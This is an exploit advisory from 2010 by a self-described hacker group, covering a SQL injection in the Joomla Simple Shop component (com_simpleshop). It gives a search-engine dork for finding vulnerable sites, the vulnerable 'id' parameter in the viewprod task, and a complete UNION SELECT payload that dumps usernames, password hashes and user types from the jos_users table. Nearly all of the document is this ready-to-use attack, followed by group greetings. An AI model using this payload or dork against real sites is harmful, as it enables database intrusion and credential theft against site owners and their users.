==============================================================
Joomla Component (com_simpleshop) SQL Injection Vulnerability
==============================================================
 
###########################
Title : Joomla Component (com_simpleshop) SQL Injection Vulnerability
Script : Joomla Galore Simple Shop
Date : 07/26/2010
Author : UnD3rGr0unD W4rri0rZ
Vendor : http://galore.co.za/
Dork : inurl:"option=com_simpleshop" & inurl:"viewprod"
###########################  
          
[ Vulnerable File ]
      
[path]/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=[SQL]
 
[SQL]:
 
id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
 
Xpl
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
 
##############################################################  
#==================================================
#{~} I am HeaDShoT(tunisian muslim hacker) From UnD3rGr0unD W4rri0rZ  {~}
#
#cont@ct:
#pwz@hotmail.Fr
#
#{~} there is always one who intelligent more than you do you should be optimistic  {~}
#==================================================
#all greetZ to allah
#&
# my friends
# M4MIM4N // L363ND //Meher Assel // Ghost_tn //ta3lab el maker // Th3 m3t4l-m4n
#
##############################################################